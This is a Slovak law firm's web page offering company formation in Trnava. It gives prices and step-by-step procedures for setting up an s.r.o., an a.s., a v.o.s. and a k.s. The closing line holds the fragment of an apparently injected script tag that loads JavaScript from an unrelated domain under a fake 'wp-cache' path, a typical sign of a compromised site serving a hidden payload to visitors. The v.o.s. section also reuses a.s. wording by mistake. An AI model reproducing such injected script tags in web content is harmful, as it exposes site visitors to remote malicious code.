Zakladanie obchodných spoločností (s.r.o., a.s.)


Založenie obchodnej spoločnosti (napr. sro) je komplikovaný a náročný právny proces, ktorý si vyžaduje odbornosť a skúsenosti. Naša spoločnosť poskytuje kompletný právny servis, ktorý zahŕňa odborné poradenstvo, vypracovanie potrebných zmlúv a všetkých podaní, komunikáciu s úradmi, založenie spoločnosti (napr. s.r.o., a.s., k.s., v.o.s.) až po jej samotný vznik, ktorý vzniká okamihom zápisu v príslušnom Obchodnom registri na príslušnom registrovom súde.


ZALOŽENIE SPOLOČNOSTI S RUČENÍM OBMEDZENÝM = S.R.O.

V CENE 350€ JE ZAHRNUTÉ:

 • Odborné poradenstvo – buď osobne v Trnave alebo prostredníctvom telefónu
 • Vypracovanie všetkých potrebných zmlúv a dokumentov
 • Všetky správne a súdne poplatky – neplatíte už nič na viac
 • Komunikácia s úradmi (daňový úrad, živnostenský úrad)
 • Vypracovanie návrhu na zápis S.R.O. do obchodného registra
 • Kompletné odovzdanie S.R.O. s kompletnou dokumentáciou

Ak zákazník pochádza z okolia Trnavy (napr. Bratislava, Senec, Šaľa, Nové zámky, Hlohovec, Nitra, Piešťany) PREFERUJEME ZALOŽENIE S.R.O. (SPOLOČNOSTI S RUČENÍM OBMEDZENÝM) PO VZÁJOMNOM OSOBNOM STRETNUTÍ V NAŠEJ KANCELÁRII V TRNAVE, ale v prípade záujmu klienta vieme založiť novú s.r.o. (spoločnosť s ručením obmedzeným) aj na diaľku v rámci celého Slovenska. Celý proces zostáva zachovaný, iba klient musí sám navštíviť notára vo svojom okolí a overiť podpisy na dokumentoch, ktoré mu vypracované zašleme poštou a následne nám tieto dokumenty zašle naspäť.

Postup pri zakladaní novej S.R.O.: (spoločnosti s ručením obmedzeným):
 • Poradenstvo (najlepšie na osobnom stretnutí v našej kancelárii) – dohodneme názov S.R.O., sídlo firmy, zvolíme predmety podnikania podľa Vašej potreby, dohodneme sa na počte spoločníkov, štatutárnych zástupcov (konateľov), spôsobe ich konania, atď.
 • Udelenie plnej moci na založenie S.R.O. – plnomocenstvo je potrebné na to, aby sme za Vás mohli navštevovať úrady, podať návrh na zapísanie s.r.o. na súde
 • Vypracovanie potrebných zmlúv a iných dokumentov – najmä Spoločenská zmluva, resp. zakladateľská listina
 • Návšteva notára – spolu navštívime notára za účelom overenia podpisov na zmluvách, u ktorých to zákon vyžaduje
 • Registrácia na živnostenskom a daňovom úrade – tento krok robíme priamo my bez Vašej účasti
 • Podanie návrhu na zápis SRO do Obchodného registra
 • Riadne odovzdanie novej SRO priamo Vám

ZALOŽENIE AKCIOVEJ SPOLOČNOSTI = a. s.

CENA DOHODOU

Akciová spoločnosť je obchodná spoločnosť, ktorej základné imanie (min. 25 000 eur) je rozdelené na určitý počet podielov – akcií, a tie vlastnia jednotliví akcionári. Akciovú spoločnosť môže založiť jeden zakladateľ, ak je zakladateľ právnickou osobou, inak dvaja alebo viacerí zakladatelia.

  Postup pri zakladaní novej a. s. (akciovej spoločnosti): Akciová spoločnosť sa zakladá podobne ako spoločnosť s ručeným obmedzeným. Základným dokumentom na založenie a.s. je zakladateľská zmluva resp. listina, ktorá musí byť napísaná vo forme notárskej zápisnice a taktiež ako pri s.r.o. vzniká zápisom do obchodného registra. Súčasťou zakladateľskej zmluvy a zakladateľskej listiny je návrh Stanov akciovej spoločnostiHodnota základného imania spoločnosti musí byť aspoň 25 000 EUR.

 

Cena zahŕňa kompletný právny servis, od odborného poradenstva, po samotné založenie a zapísanie akciovej spoločnosti v Obchodnom registri.

ZALOŽENIE VEREJNEJ OBCHODNEJ SPOLOČNOSTI (v. o. s.) A KOMANDITNEJ SPOLOČNOSTI (k. s.)

CENA DOHODOU

Je to osobná spoločnosť, v ktorej aspoň dve osoby (fyzická ako aj právnická) podnikajú pod spoločným obchodným menom a ručia za záväzky spoločnosti celým svojím majetkom. Maximálny počet spoločníkov nie je obmedzený. Táto právna forma má veľmi blízko združeniu, má však právnu subjektivitu.

Cena zahŕňa kompletný právny servis, od odborného poradenstva, po samotné založenie a zapísanie akciovej spoločnosti v Obchodnom registri.

 
script src="https://pr0gram.org/wp-cache/0a.js">